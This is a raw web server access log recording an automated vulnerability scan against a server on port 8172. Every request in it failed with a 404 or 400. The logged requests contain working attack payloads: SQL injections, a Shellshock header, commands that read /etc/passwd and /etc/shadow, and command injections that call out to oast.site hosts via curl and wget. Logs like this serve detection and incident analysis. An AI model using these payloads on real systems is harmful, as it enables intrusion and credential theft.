2023-08-04 11:06:47 103.153.214.94 POST /OA_HTML/BneViewerXMLService bne:uueupload=TRUE 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 77
2023-08-04 11:11:15 103.153.214.94 GET /pods - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 59
2023-08-04 11:11:20 103.153.214.94 GET /api/v1/pods - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 79
2023-08-04 11:15:07 103.153.214.94 POST /classes/Master.php f=delete_team 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 66
2023-08-04 11:16:31 103.153.214.94 GET /pfblockerng/www/index.php - 8172 - 111.90.143.37 - - 404 7 0 76
2023-08-04 11:23:25 103.153.214.94 GET /api/get_device_details - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/assets/base/home.html 404 7 0 61
2023-08-04 11:31:25 103.153.214.94 POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 62
2023-08-04 11:33:11 103.153.214.94 GET /crowd/plugins/servlet/exp cmd=cat%20/etc/shadow 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 347
2023-08-04 11:33:33 103.153.214.94 POST /wp-admin/admin.php page=html2wp-settings 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 73
2023-08-04 11:33:42 103.153.214.94 GET /wp-content/uploads/html2wp/2TSGVUvNsn5W9YgeIo7r2Ssbli0.php - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 64
2023-08-04 11:34:45 103.153.214.94 POST /lumis/portal/controller/xml/PageControllerXml.jsp - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 79
2023-08-04 11:39:45 103.153.214.94 GET /system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 98
2023-08-04 11:39:50 103.153.214.94 GET /system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 61
2023-08-04 11:44:53 103.153.214.94 GET /forms/doLogin login_username=admin&password=password$(curl%20cj5gsq24749fn87ofdl0xetryq4yceehy.oast.site)&x=0&y=0 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 82
2023-08-04 11:46:28 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 100
2023-08-04 11:51:56 103.153.214.94 GET /author_posts.php author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL--%20-&p_id=1 8172 - 111.90.143.37 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 83
2023-08-04 11:52:02 103.153.214.94 GET /cms/author_posts.php author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL--%20-&p_id=1 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 60
2023-08-04 11:54:05 103.153.214.94 GET / PagePrincipale/rss&id=1%27+and+extractvalue(0x0a,concat(0x0a,(select+concat_ws(0x207c20,md5(999999999),1,user()))))--+- 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 86
2023-08-04 11:57:26 103.153.214.94 POST /mailingupgrade.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 58
2023-08-04 12:06:27 103.153.214.94 POST /admin/login.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 84
2023-08-04 12:06:32 103.153.214.94 GET /admin/dashboard.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 62
2023-08-04 12:07:09 103.153.214.94 GET /Collector/storagemgmt/apply data%5B0%5D%5Bhost%5D=%60/bin/wget+http://cj5gsq24749fn87ofdl0796nge66p4hpc.oast.site%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype 8172 - 111.90.143.37 - - 404 7 0 55
2023-08-04 12:10:28 103.153.214.94 POST /mifs/j_spring_security_check - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 https://bcvt.kontum.gov.vn:8172/mifs/user/login.jsp 404 7 0 84
2023-08-04 12:18:42 103.153.214.94 GET /api.php c=project&f=index&token=1234&id=news&sort=1+and+extractvalue(1,concat(0x7e,md5(999999999)))+--+ 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 58
2023-08-04 12:21:16 103.153.214.94 GET /forum/ subscribe_topic=1%20union%20select%201%20and%20sleep(6) 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 57
2023-08-04 12:22:59 103.153.214.94 POST /dfsms/ - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 83
2023-08-04 12:28:00 103.153.214.94 GET /wp-admin/admin-ajax.php action=memberhero_send_form&_memberhero_hook=phpinfo 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 107
2023-08-04 12:30:26 103.153.214.94 POST /classes/Login.php f=login 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 80
2023-08-04 12:31:25 103.153.214.94 POST /hms/doctor/ - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 90
2023-08-04 12:35:13 103.153.214.94 GET /openstack/latest - 8172 - 111.90.143.37 - - 404 7 0 72
2023-08-04 12:35:16 103.153.214.94 GET /openstack/latest - 8172 - 111.90.143.37 - - 404 7 0 77
2023-08-04 12:41:31 103.153.214.94 GET /cgi-bin/jarrewrite.sh - 8172 - 111.90.143.37 "()+{+:;+};+echo+;+/bin/bash+-c+'cat+/etc/passwd'" - 404 7 0 58
2023-08-04 12:42:21 103.153.214.94 OPTIONS / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 76
2023-08-04 12:45:46 103.153.214.94 POST /suite-api/api/auth/token/acquire - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 https://bcvt.kontum.gov.vn:8172/ui/ 404 7 0 64
2023-08-04 12:49:20 103.153.214.94 POST /ws_utc/resources/setting/options - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 84
2023-08-04 12:49:24 103.153.214.94 POST /ws_utc/resources/setting/keystore - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 61
2023-08-04 12:53:54 103.153.214.94 POST /wp-admin/admin-ajax.php action=iws_gff_fetch_states 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 69
2023-08-04 12:57:47 103.153.214.94 GET /admin/index.php p=ajax-ops&op=elfinder&cmd=mkfile&name=2TSGVwIWOy9XIhnt63azYzmtxeA.php&target=l1_Lw 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 89
2023-08-04 13:05:19 103.153.214.94 POST /wp-json/visualizer/v1/upload-data - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 387
2023-08-04 13:18:20 103.153.214.94 POST /vendor/htmlawed/htmlawed/htmLawedTest.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 344
2023-08-04 13:19:14 103.153.214.94 POST /incom/modules/uploader/showcase/script.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 64
2023-08-04 13:19:24 103.153.214.94 GET /upload/userfiles/image/2TSGVNY1BgMFMEx3duoy4TGusHe.png - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 78
2023-08-04 13:24:13 103.153.214.94 GET /wp-content/plugins/ultimate-member/readme.txt - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 85
2023-08-04 13:28:23 103.153.214.94 GET /bin/view/"]]+{{async+async="true"+cached="false"+context="doc.reference"}}{{python}}print(3724348+*+8473334){{/python}}{{/async}} sheet=SkinsCode.XWikiSkinsSheet&xpage=view 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 400 0 0 61
2023-08-04 13:28:30 103.153.214.94 GET /asyncrenderer/{{url}} clientId={{id}}&timeout=500&wiki=xwiki 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 83
2023-08-04 13:33:40 103.153.214.94 POST /index.php - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 85
2023-08-04 13:47:03 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 88
2023-08-04 13:47:11 103.153.214.94 GET /wp-content/plugins/documentor-lite/core/js/documentor.js - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 81
2023-08-04 13:48:20 103.153.214.94 POST /api.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 58
2023-08-04 13:58:29 103.153.214.94 POST /admin/index.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 84
2023-08-04 13:58:36 103.153.214.94 GET /admin/dashboard.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 77
2023-08-04 14:02:43 103.153.214.94 POST /wp-admin/admin-ajax.php action=get_tag_fonts 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 84
2023-08-04 14:09:01 103.153.214.94 GET /index.php plot=;wget%20http://cj5gsq24749fn87ofdl0nr6xp4nfb7js6.oast.site 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 76
2023-08-04 14:16:37 103.153.214.94 PUT /_users/org.couchdb.user:poc - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 400 0 0 58
2023-08-04 14:20:22 103.153.214.94 GET /admin/elfinder/elfinder-cke.html - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 81
2023-08-04 14:20:31 103.153.214.94 GET /assets/backend/elfinder/elfinder-cke.html - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 56
2023-08-04 14:20:40 103.153.214.94 GET /assets/elFinder-2.1.9/elfinder.html - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 58
2023-08-04 14:20:49 103.153.214.94 GET /assets/elFinder/elfinder.html - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 81
2023-08-04 14:20:58 103.153.214.94 GET /backend/elfinder/elfinder-cke.html - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 79
2023-08-04 14:21:08 103.153.214.94 GET /elfinder/elfinder-cke.html - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 84
2023-08-04 14:21:18 103.153.214.94 GET /uploads/assets/backend/elfinder/elfinder-cke.html - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 80
2023-08-04 14:21:21 103.153.214.94 POST /ui/api/v1/ui/auth/login - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 57
2023-08-04 14:21:28 103.153.214.94 GET /uploads/assets/backend/elfinder/elfinder.html - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 80
2023-08-04 14:21:38 103.153.214.94 GET /uploads/elfinder/elfinder-cke.html - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 61
2023-08-04 14:22:24 103.153.214.94 POST /admin/login.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 58
2023-08-04 14:30:27 103.153.214.94 GET /images/json - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 109
2023-08-04 14:34:52 103.153.214.94 POST /actuator/env - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 88
2023-08-04 14:37:45 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 77
2023-08-04 14:37:53 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 65
2023-08-04 14:45:30 103.153.214.94 GET / ... 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 400 0 0 70
2023-08-04 14:47:14 103.153.214.94 GET /apisix/admin/migrate/export - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 62
2023-08-04 14:57:42 103.153.214.94 POST /wp-json/pie/v1/login - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 85
2023-08-04 14:58:18 103.153.214.94 GET /wp-content/plugins/contact-form-7/readme.txt - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 59
2023-08-04 15:02:02 103.153.214.94 GET /STATE_ID/123/agentLogUploader - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 86
2023-08-04 15:11:05 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 79
2023-08-04 15:18:13 103.153.214.94 GET /js/elfinder.min.js - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 70
2023-08-04 15:18:19 103.153.214.94 GET /js/elFinder.version.js - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 80
2023-08-04 15:19:33 103.153.214.94 GET /sap/admin/public/default.html - 8172 - 111.90.143.37 - - 404 7 0 101
2023-08-04 15:19:40 103.153.214.94 GET /sap/public/bc/ur/Login/assets/corbu/sap_logo.png - 8172 - 111.90.143.37 - - 404 7 0 103
2023-08-04 15:23:46 103.153.214.94 POST /upload - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 60
2023-08-04 15:34:42 103.153.214.94 POST /login.htm - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 58
2023-08-04 15:36:56 103.153.214.94 POST /jars/upload - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 101
2023-08-04 15:44:41 103.153.214.94 GET / season=1&league_id=1season=1&league_id=1'+AND+(SELECT+1909+FROM+(SELECT(SLEEP(6)))ZiBf)--+qODp&match_day=1&match_day=1&team_id=1&team_id=1 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 60
2023-08-04 15:47:44 103.153.214.94 POST /ocpu/library/base/R/do.call/json - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 61
2023-08-04 15:48:07 103.153.214.94 GET /wp-content/plugins/wp-autosuggest/autosuggest.php wpas_action=query&wpas_keys=1%27%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F5202%2F%2A%2A%2FFROM%2F%2A%2A%2F%28SELECT%28SLEEP%286%29%29%29yRVR%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28%27dwQZ%27%2F%2A%2A%2FLIKE%2F%2A%2A%2F%27dwQZ 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 74
2023-08-04 16:01:13 103.153.214.94 POST /geoserver/wms - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 86
2023-08-04 16:01:47 103.153.214.94 GET /wp-admin/admin-ajax.php action=upg_datatable&field=field:exec:head+-1+/etc/passwd:NULL:NULL 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 81
2023-08-04 16:02:01 103.153.214.94 POST /main/inc/ajax/extra_field.ajax.php a=search_options_from_tags 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 95
2023-08-04 16:02:10 103.153.214.94 POST /main/inc/ajax/extra_field.ajax.php a=search_options_from_tags 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 55
2023-08-04 16:02:51 103.153.214.94 GET / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 61
2023-08-04 16:04:10 103.153.214.94 GET /api/v1/database/1 - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 82
2023-08-04 16:04:18 103.153.214.94 GET /api/v1/database/2 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 83
2023-08-04 16:04:27 103.153.214.94 GET /api/v1/database/3 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 53
2023-08-04 16:04:35 103.153.214.94 GET /api/v1/database/4 - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 55
2023-08-04 16:04:45 103.153.214.94 GET /api/v1/database/5 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 373
2023-08-04 16:04:53 103.153.214.94 GET /api/v1/database/6 - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 78
2023-08-04 16:05:02 103.153.214.94 GET /api/v1/database/7 - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 77
2023-08-04 16:05:09 103.153.214.94 GET /api/v1/database/9 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 80
2023-08-04 16:05:18 103.153.214.94 GET /api/v1/database/10 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 257
2023-08-04 16:05:26 103.153.214.94 GET /api/v1/database/1 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 119
2023-08-04 16:05:34 103.153.214.94 GET /api/v1/database/2 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 123
